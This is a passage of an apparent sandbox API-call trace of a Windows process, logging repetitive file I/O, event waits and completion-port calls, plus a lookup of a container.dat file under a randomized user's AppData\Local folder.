lpOverlapped=0x552ff50) returned 1 [0089.541] SetEvent (hEvent=0x2e4) returned 1 [0089.541] GetCurrentThreadId () returned 0x5b0 [0089.541] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.541] GetLastError () returned 0x3e5 [0089.541] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.542] GetCurrentThreadId () returned 0x5b0 [0089.542] WriteFile (in: hFile=0x268, lpBuffer=0x2621140, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2621140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.542] SetEvent (hEvent=0x2fc) returned 1 [0089.542] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.542] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.543] SetEvent (hEvent=0x2e4) returned 1 [0089.543] GetCurrentThreadId () returned 0x5b0 [0089.543] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.543] GetLastError () returned 0x3e5 [0089.543] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.775] GetCurrentThreadId () returned 0x5b0 [0089.775] SetEvent (hEvent=0x244) returned 1 [0089.775] GetCurrentThreadId () returned 0x5b0 [0089.775] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.775] GetLastError () returned 0x3e5 [0089.775] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.777] GetCurrentThreadId () returned 0x5b0 [0089.778] WriteFile (in: hFile=0x268, lpBuffer=0x2621178, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2621178, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.778] SetEvent (hEvent=0x2fc) returned 1 [0089.778] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.778] GetQueuedCompletionStatus (CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff) Thread: id = 46 os_tid = 0x834 [0078.906] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.906] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0078.907] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.907] GetCurrentThreadId () returned 0x834 [0078.907] GetCurrentThreadId () returned 0x834 [0078.907] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x260 [0078.907] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0078.907] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0x7530) returned 0x0 [0078.908] CloseHandle (hObject=0x260) returned 1 [0078.908] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.908] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.908] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0078.908] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.909] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.909] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0078.909] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0079.159] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.159] GetCurrentThreadId () returned 0x834 [0079.159] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x59ff7b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0079.160] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0079.160] wcslen (_String="*") returned 0x1 [0079.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x59ffbc0 | out: lpFindFileData=0x59ffbc0) returned 0x2da4130 [0079.160] wcslen (_String=".") returned 0x1 [0079.160] FindNextFileW (in: hFindFile=0x2da4130, lpFindFileData=0x59ffbc0 | out: lpFindFileData=0x59ffbc0) returned 1 [0079.160] wcslen (_String="..") returned 0x2 [0079.160] FindNextFileW (in: hFindFile=0x2da4130, lpFindFileData=0x59ffbc0 | out: lpFindFileData=0x59ffbc0) returned 1 [0079.160] wcslen (_String="454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4") returned 0x28 [0079.160] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0079.160] wcslen (_String="454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4") returned 0x28 [0079.160] wcslen (_String="container.dat") returned 0xd [0079.160] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat")) returned 0x2020 [0079.160] FindClose (in: hFindFile=0x2da4130 | out: hFindFile=0x2da4130) returned 1 [0079.160] strlen (_Str="wrap.dll") returned 0x8 [0079.160] strlen (_Str="wrap.dll") returned 0x8 [0079.160] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0079.160] strlen (_Str="core") returned 0x4 [0079.161] GetCurrentThreadId () returned 0x834 [0079.161] GetCurrentThreadId () returned 0x834 [0079.161] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0079.161] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0079.162] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0079.162] CloseHandle (hObject=0x2bc) returned 1 [0079.162] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0079.162] CloseHandle (hObject=0x25c) returned 1 [0079.163] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.163] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.163] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0079.394] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.394] GetCurrentThreadId () returned 0x834 [0079.394] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0079.394] strlen (_Str="core") returned 0x4 [0079.395] GetCurrentThreadId () returned 0x834 [0079.395] GetCurrentThreadId () returned 0x834 [0079.395] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0079.395] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0079.397] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0079.397] CloseHandle (hObject=0x2bc) returned 1 [0079.397] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0079.397] CloseHandle (hObject=0x25c) returned 1 [0079.397] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.397] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.397] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0079.629] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.629] GetCurrentThreadId () returned 0x834 [0079.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0079.629] strlen (_Str="core") returned 0x4 [0079.629] GetCurrentThreadId () returned 0x834 [0079.629] GetCurrentThreadId () returned 0x834 [0079.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0079.629] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0079.631] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0079.631] CloseHandle (hObject=0x2bc) returned 1 [0079.631] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0079.631] CloseHandle (hObject=0x25c) returned 1 [0079.631] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.631] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0079.631] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0080.030] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.030] GetCurrentThreadId () returned 0x834 [0080.031] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0080.031] strlen (_Str="core") returned 0x4 [0080.031] GetCurrentThreadId () returned 0x834 [0080.031] GetCurrentThreadId () returned 0x834 [0080.031] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0080.031] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0080.032] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0080.033] CloseHandle (hObject=0x2bc) returned 1 [0080.033] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0080.033] CloseHandle (hObject=0x25c) returned 1 [0080.033] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.033] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.033] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0080.267] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.267] GetCurrentThreadId () returned 0x834 [0080.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0080.268] strlen (_Str="core") returned 0x4 [0080.268] GetCurrentThreadId () returned 0x834 [0080.268] GetCurrentThreadId () returned 0x834 [0080.268] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0080.268] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0080.269] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0080.269] CloseHandle (hObject=0x2bc) returned 1 [0080.269] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0080.270] CloseHandle (hObject=0x25c) returned 1 [0080.270] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.270] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.270] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0080.501] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.501] GetCurrentThreadId () returned 0x834 [0080.501] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0080.501] strlen (_Str="core") returned 0x4 [0080.502] GetCurrentThreadId () returned 0x834 [0080.502] GetCurrentThreadId () returned 0x834 [0080.502] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0080.502] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0080.503] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0080.503] CloseHandle (hObject=0x2bc) returned 1 [0080.503] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0080.503] CloseHandle (hObject=0x25c) returned 1 [0080.503] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.503] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.503] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0080.735] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.735] GetCurrentThreadId () returned 0x834 [0080.736] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0080.736] strlen (_Str="core") returned 0x4 [0080.736] GetCurrentThreadId () returned 0x834 [0080.736] GetCurrentThreadId () returned 0x834 [0080.736] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0080.736] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0080.738] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0080.738] CloseHandle (hObject=0x2bc) returned 1 [0080.738] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0080.738] CloseHandle (hObject=0x25c) returned 1 [0080.738] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.738] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.739] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0080.971] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.971] GetCurrentThreadId () returned 0x834 [0080.971] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0080.972] strlen (_Str="core") returned 0x4 [0080.972] GetCurrentThreadId () returned 0x834 [0080.972] GetCurrentThreadId () returned 0x834 [0080.972] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0080.972] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0080.974] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0080.974] CloseHandle (hObject=0x2bc) returned 1 [0080.974] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0080.974] CloseHandle (hObject=0x25c) returned 1 [0080.974] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.974] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0080.974] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0081.526] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0081.526] GetCurrentThreadId () returned 0x834 [0081.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0081.527] strlen (_Str="core") returned 0x4 [0081.527] GetCurrentThreadId () returned 0x834 [0081.527] GetCurrentThreadId () returned 0x834 [0081.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0081.527] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0081.528] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0081.528] CloseHandle (hObject=0x2bc) returned 1 [0081.529] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0081.529] CloseHandle (hObject=0x25c) returned 1 [0081.529] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0081.529] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0081.529] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0082.463] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.463] GetCurrentThreadId () returned 0x834 [0082.463] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0082.463] strlen (_Str="core") returned 0x4 [0082.463] GetCurrentThreadId () returned 0x834 [0082.463] GetCurrentThreadId () returned 0x834 [0082.463] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0082.463] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0082.465] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0082.465] CloseHandle (hObject=0x2bc) returned 1 [0082.465] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0082.465] CloseHandle (hObject=0x25c) returned 1 [0082.465] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.465] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.465] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0082.697] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.697] GetCurrentThreadId () returned 0x834 [0082.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0082.697] strlen (_Str="core") returned 0x4 [0082.697] GetCurrentThreadId () returned 0x834 [0082.697] GetCurrentThreadId () returned 0x834 [0082.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0082.698] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0082.699] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0082.699] CloseHandle (hObject=0x2bc) returned 1 [0082.699] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0082.699] CloseHandle (hObject=0x25c) returned 1 [0082.699] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.700] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.700] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0082.931] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.931] GetCurrentThreadId () returned 0x834 [0082.931] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0082.932] strlen (_Str="core") returned 0x4 [0082.932] GetCurrentThreadId () returned 0x834 [0082.932] GetCurrentThreadId () returned 0x834 [0082.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0082.932] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0082.933] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0082.933] CloseHandle (hObject=0x2bc) returned 1 [0082.933] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0082.933] CloseHandle (hObject=0x25c) returned 1 [0082.933] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.933] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0082.933] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0083.166] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.166] GetCurrentThreadId () returned 0x834 [0083.166] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0083.166] strlen (_Str="core") returned 0x4 [0083.166] GetCurrentThreadId () returned 0x834 [0083.166] GetCurrentThreadId () returned 0x834 [0083.166] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0083.166] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0083.168] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0083.168] CloseHandle (hObject=0x2bc) returned 1 [0083.168] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0083.168] CloseHandle (hObject=0x25c) returned 1 [0083.168] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.168] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.168] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0083.460] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.460] GetCurrentThreadId () returned 0x834 [0083.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0083.460] strlen (_Str="core") returned 0x4 [0083.461] GetCurrentThreadId () returned 0x834 [0083.461] GetCurrentThreadId () returned 0x834 [0083.461] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0083.461] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0083.462] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0083.462] CloseHandle (hObject=0x2bc) returned 1 [0083.462] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0083.462] CloseHandle (hObject=0x25c) returned 1 [0083.462] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.462] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.462] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0083.694] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.694] GetCurrentThreadId () returned 0x834 [0083.694] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0083.694] strlen (_Str="core") returned 0x4 [0083.695] GetCurrentThreadId () returned 0x834 [0083.695] GetCurrentThreadId () returned 0x834 [0083.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0083.695] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0083.696] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0083.696] CloseHandle (hObject=0x2bc) returned 1 [0083.696] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0083.696] CloseHandle (hObject=0x25c) returned 1 [0083.696] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.697] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.697] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0083.929] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.929] GetCurrentThreadId () returned 0x834 [0083.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0083.929] strlen (_Str="core") returned 0x4 [0083.929] GetCurrentThreadId () returned 0x834 [0083.929] GetCurrentThreadId () returned 0x834 [0083.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0083.929] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0083.931] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0083.931] CloseHandle (hObject=0x2bc) returned 1 [0083.931] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0083.931] CloseHandle (hObject=0x25c) returned 1 [0083.931] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.931] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0083.931] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0084.163] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.164] GetCurrentThreadId () returned 0x834 [0084.164] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0084.164] strlen (_Str="core") returned 0x4 [0084.164] GetCurrentThreadId () returned 0x834 [0084.164] GetCurrentThreadId () returned 0x834 [0084.164] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0084.164] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0084.166] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0084.166] CloseHandle (hObject=0x2bc) returned 1 [0084.166] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0084.166] CloseHandle (hObject=0x25c) returned 1 [0084.166] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.166] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.166] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0084.398] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.398] GetCurrentThreadId () returned 0x834 [0084.398] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0084.398] strlen (_Str="core") returned 0x4 [0084.398] GetCurrentThreadId () returned 0x834 [0084.398] GetCurrentThreadId () returned 0x834 [0084.398] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0084.398] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0084.400] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0084.400] CloseHandle (hObject=0x2bc) returned 1 